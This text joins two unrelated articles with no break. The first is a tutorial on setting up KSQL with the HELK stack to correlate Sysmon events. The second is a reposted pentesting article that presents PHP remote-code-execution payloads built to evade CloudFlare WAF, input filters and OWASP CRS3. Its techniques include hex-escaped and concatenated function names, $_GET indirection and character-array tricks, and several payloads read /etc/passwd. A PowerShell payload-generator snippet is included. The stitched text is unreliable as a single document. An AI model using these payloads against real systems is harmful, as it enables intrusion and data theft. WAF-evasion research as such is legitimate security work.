A data model in general determines the structure of data objects present in a data set and the relationships identified among them. From a security events perspective, data objects can be entities provided in event logs such as a “User”, a “Host”, a “Process”, a “File”, or even an “IP address”. As with any other data object, they also have properties such as “user_name”, “host_name”, “process_name” or “file_name”, and depending on the information provided by each event log, relationships can be defined among those data objects as shown below:

Modeling the data objects identified in security event logs helps security analysts to identify the right data sources and correlations that can be used for the development of data analytics.

What is the “Sysmon Data Model”?

Windows Sysmon event logs provide information about several data objects such as “Processes”, “IP Addresses”, “Files”, “Registry Keys”, and even “Named Pipes”. In addition, most of their data objects have a common property named ProcessGUID that defines direct relationships among specific Sysmon events. According to my teammates Matt Graeber and Lee Christensen, in their recent white paper “Subverting Sysmon”, the ProcessGUID is a unique value derived from the machine GUID, process start time, and process token ID that can be used to correlate other related events. After documenting the relationships among Sysmon events and data objects based on their ProcessGUID property, the following data model is possible:

As we already know, KSQL join operations happen on common unique data key values. Therefore, the ProcessGUID property can be used to join Sysmon events. For the purpose of this post, we will join ProcessCreate (Event ID 1) and NetworkConnect (Event ID 3) events.

HELK and KSQL Integration

KSQL was developed as part of the Confluent platform, and it can be distributed via docker images available on DockerHub. HELK is deployed via docker images as a proof of concept, so having docker images for KSQL works perfectly. The two docker images that I added to the HELK ecosystem are the following ones:

  • Cp-ksql-server Image: It includes the ksql-server package which runs the engine that executes KSQL queries.
  • Cp-ksql-cli Image: It includes the ksql-cli package which acts as a client to the KSQL server which allows researchers to interactively pass KSQL queries to the KSQL server. This one is added to the HELK just for testing purposes. The KSQL server can run independently with predefined SQL queries files.

For this blog post, we will need the following:

  • An Ubuntu box hosting the latest HELK build
  • A Windows 10 System with Sysmon installed
  • Winlogbeat installed on the Windows 10 and shipping logs to HELK

Deploying KSQL via HELK

Clone the HELK to your Ubuntu box, and change your directory to docker as shown below:

git clone https://github.com/Cyb3rWard0g/HELK.git
cd HELK/docker

Run the helk_install.sh script to install and run the HELK docker images. You can just go with all the default options and run the basic HELK deployment which comes with both KSQL server and KSQL CLI containers.

sudo ./helk_install.sh

If you want to monitor your HELK installation, you can open another console and run the following command:

tail -f /var/log/helk-install.log

Once the installation finishes, you should see the following on your main screen:

Run the following commands to see if your containers are running:

sudo docker ps

Launch KSQL CLI interface

You are now ready to start using KSQL. We will use KSQL via its command line interface (CLI) to connect to the helk-ksql-server container and send KSQL queries to it. Run the following command to access the helk-ksql-cli container and establish a connection to the helk-ksql-server container:

sudo docker exec -ti helk-ksql-cli ksql http://helk-ksql-server:8088

A KSQL CLI banner will show up, and you will be able to use the KSQL CLI.

Inspect the KSQL Server Properties

You can now start by checking the properties assigned to the KSQL server by running the following commands:

ksql> SHOW PROPERTIES;

The information above confirms that the helk-kafka-broker is part of ksql.streams.bootstrap.servers. Therefore, we will be able to execute KSQL queries on the topics available in the Kafka broker.

Check Available Kafka Topics

We can check the metadata of topics available on our helk-kafka-broker with the SHOW TOPICS command.

ksql> SHOW TOPICS;

What the HELK is going on so far?

Up to this point, we have all we need to start using KSQL on top of the HELK project. The following is happening:

  • HELK’s Kafka broker with topic winlogbeat running
  • KSQL Server is running and configured to read from the Kafka topic named winlogbeat
  • KSQL CLI is running and configured to talk to KSQL Server and send interactive queries
  • Your Ubuntu box hosting the HELK has an interactive connection to the helk-ksql-cli container
  • HELK is waiting for Windows Sysmon logs to be published

Get Sysmon Data to HELK

You can now install Sysmon and Winlogbeat following the initial instructions in this post. The following binary versions and configurations are recommended:

Sysmon V8.04

Winlogbeat V6.5.3

Remember to start the winlogbeat service to start sending logs to the HELK Kafka broker as shown in the image below:
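If Winlogbeat was installed as a Windows service (the default when using its install script), starting it from an elevated PowerShell prompt might look like this; the service name below is an assumption based on the default install:

# Start the Winlogbeat shipper service so events begin flowing to the HELK Kafka broker.
Start-Service winlogbeat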

Check Winlogbeat Shipping Logs

You can check if the logs being collected by the Winlogbeat Shipper are being published to your HELK Kafka broker by running the following command on your Windows endpoint:

winlogbeat.exe -e

Check Logs Published to Kafka Topics

You can also inspect messages making it to the Kafka topic winlogbeat with the PRINT command as shown below:

ksql> PRINT 'winlogbeat';

We can confirm that data is flowing from our Windows system to our HELK Kafka broker, and through our KSQL Server.


I hope this first post helped you get familiar with the basic concepts of KSQL and showed you how easy it is to use it with the latest version of HELK. In the next post, I will show you how to use KSQL to start joining Sysmon events 1 and 3 in real time. The Sysmon-Join KSQL Recipe will be shared so you can try it yourself.

References

https://docs.confluent.io/current/ksql/docs/developer-guide/join-streams-and-tables.html#join-streams-and-tables-with-ksql
https://www.confluent.io/blog/introducing-kafka-streams-stream-processing-made-simple/
https://docs.confluent.io/current/ksql/docs/index.html
https://hub.docker.com/u/confluentinc
https://docs.confluent.io/current/ksql/docs/index.html#what-are-the-components
https://docs.confluent.io/current/installation/docker/docs/image-reference.html
https://docs.confluent.io/current/ksql/docs/developer-guide/syntax-reference.html#ksql-syntax-reference

How To Exploit PHP Remotely To Bypass Filters & WAF Rules

( Original text by Andrea Menin )

In the last three articles, I've been focused on how to bypass WAF rule sets in order to exploit a remote command execution. In this article, I'll show you how many possibilities PHP gives us to exploit a remote code execution by bypassing filters, input sanitization, and WAF rules. Usually when I write articles like this one, people ask “do people really write code like this?”, and typically they're not pentesters. Let me answer before you ask me again: YES and YES.

This is the first of two vulnerable PHP scripts that I'm going to use for all tests. This script is definitely too easy and dumb, but it's just meant to reproduce a remote code execution vulnerability scenario (in a real scenario, you'll probably do a bit more work to reach this situation):

first PHP script

Obviously, the sixth line is pure evil. The third line tries to intercept functions like system, exec, or passthru (there are many other functions in PHP that can execute system commands, but let's focus on these three). This script is running on a web server behind the CloudFlare WAF (as always, I'm using CloudFlare because it's easy and widely known; this doesn't mean that the CloudFlare WAF is not secure, since all other WAFs have the same issues, more or less). The second script will be behind ModSecurity + OWASP CRS3.

Trying to read /etc/passwd

For the first test, I try to read /etc/passwd using the system() function with the request /cfwaf.php?code=system("cat /etc/passwd");

CloudFlare WAF blocks my first try

As you can see, CloudFlare blocks my request (probably because of “/etc/passwd”) but, if you have read my last article about uninitialized variables, I can easily bypass this with something like cat /etc$u/passwd

CloudFlare WAF bypassed but input sanitization blocks the request

The CloudFlare WAF has been bypassed, but the check on the user's input blocked my request because I'm trying to use the “system” function. Is there a syntax that lets me use the system function without using the “system” string? Let's take a look at the PHP documentation about strings!

PHP String escape sequences

\[0-7]{1,3}: a sequence of characters in octal notation, which silently overflows to fit in a byte (e.g. “\400” === “\000”)

\x[0-9A-Fa-f]{1,2}: a sequence of characters in hexadecimal notation (e.g. “\x41”)

\u{[0-9A-Fa-f]+}: a Unicode codepoint, which will be output to the string as that codepoint's UTF-8 representation (added in PHP 7.0.0)

Not everyone knows that PHP has a lot of syntaxes for representing a string, and combined with “PHP variable functions”, this becomes our Swiss Army knife for bypassing filters and rules.

PHP Variable functions

PHP supports the concept of variable functions. This means that if a variable name has parentheses appended to it, PHP will look for a function with the same name as whatever the variable evaluates to, and will attempt to execute it. Among other things, this can be used to implement callbacks, function tables, and so forth.

This means that syntaxes like $var(args); and “string”(args); are equivalent to function(args);. If I can call a function by using a variable or a string, it means that I can use an escape sequence instead of the name of the function. Here is an example:

An escape sequence of characters in hexadecimal notation, for example "\x73\x79\x73\x74\x65\x6d", is converted by PHP to the string “system”, which is then invoked as the system function with the argument “ls”. Let's try it with our vulnerable script:

user input sanitization bypassed

This technique doesn't work for all PHP functions; variable functions won't work with language constructs such as echo, print, unset(), isset(), empty(), include, require, and the like. Utilize wrapper functions to make use of any of these constructs as variable functions.
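Since these payloads are just strings sent in a query parameter, you can generate the hex-escaped form of a function name from your own machine before sending the request; a small PowerShell sketch (the function name and argument below are just examples) could look like this:

# Build a hex-escaped PHP payload for an arbitrary function name (sketch).
$fn  = 'system'
$hex = -join ($fn.ToCharArray() | ForEach-Object { '\x{0:x2}' -f [int]$_ })
"`"$hex`"(`"ls`");"   # yields "\x73\x79\x73\x74\x65\x6d"("ls");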

Improve the user input sanitization

What happens if I exclude characters like double and single quotes from the user input on the vulnerable script? Is it possible to bypass it even without using double quotes? Let’s try:

prevent using “ and ‘ on $_GET[code]

As you can see on the third line, the script now prevents the use of the double-quote (") and single-quote (') characters inside the $_GET[code] query string parameter. My previous payload should be blocked now:

Now my vulnerable script prevents using “

Luckily, in PHP, we don't always need quotes to represent a string. PHP lets you declare the type of an element with something like $a = (string)foo; in this case, $a contains the string “foo”. Moreover, whatever is inside round brackets without a specific type declaration is treated as a string:

In this case, we have two ways to bypass the new filter. The first one is to use something like (system)(ls); but we can't use “system” inside the code parameter, so we can concatenate strings like (sy.(st).em)(ls);. The second one is to use the $_GET variable. If I send a request like ?a=system&b=ls&code=$_GET[a]($_GET[b]); the result is: $_GET[a] will be replaced with the string “system” and $_GET[b] will be replaced with the string “ls”, and I'll be able to bypass all filters!

Let's try with the first payload (sy.(st).em)(whoami);

WAF bypassed, filter bypassed

and the second payload ?a=system&b=cat+/etc&c=/passwd&code=$_GET[a]($_GET[b].$_GET[c]);

WAF bypassed, filter bypassed

In this case it is not useful, but you can even insert comments inside the function name and inside the arguments (this could be useful in order to bypass WAF rule sets that block specific PHP function names); for example, something like (sy.(st)./*comment*/em)(whoami/*comment*/); would still execute. All of the following syntaxes are valid:

get_defined_functions

This PHP function returns a multidimensional array containing a list of all defined functions, both built-in (internal) and user-defined. The internal functions are accessible via $arr["internal"], and the user-defined ones via $arr["user"]. For example:

This could be another way to reach the system function without using its name. If I grep for “system” I can discover its index number and use it as a string for my code execution:

1077 = system

Obviously, this should also work against our CloudFlare WAF and the script filters:

bypass using get_defined_functions

Array of characters

Each string in PHP can be used as an array of characters (almost like Python does), and you can refer to a single character with the syntax $string[2] or $string[-3]. This could be another way to elude rules that block PHP function names. For example, with the string $a="elmsty/ "; I can compose the syntax system("ls /tmp");

If you're lucky, you can find all the characters you need inside the script filename. With the same technique, you can pick all the characters you need with something like (__FILE__)[2]:

OWASP CRS3

Let me say that with the OWASP CRS3 everything becomes harder. First, with the techniques seen above I can bypass only the first paranoia level, and this is impressive: Paranoia Level 1 is just a small subset of the rules found in CRS3, and that level is designed to avoid any kind of false positive. With Paranoia Level 2 things get hard because of rule 942430, “Restricted SQL Character Anomaly Detection (args): # of special characters exceeded”. What I can do is just execute a single command without arguments like “ls”, “whoami”, etc., but I can't execute something like system("cat /etc/passwd") as I did with the CloudFlare WAF:

Previous Episodes

Web Application Firewall Evasion Techniques #1
https://medium.com/secjuice/waf-evasion-techniques-718026d693d8

Web Application Firewall Evasion Techniques #2
https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0

Web Application Firewall Evasion Techniques #3
https://www.secjuice.com/web-application-firewall-waf-evasion/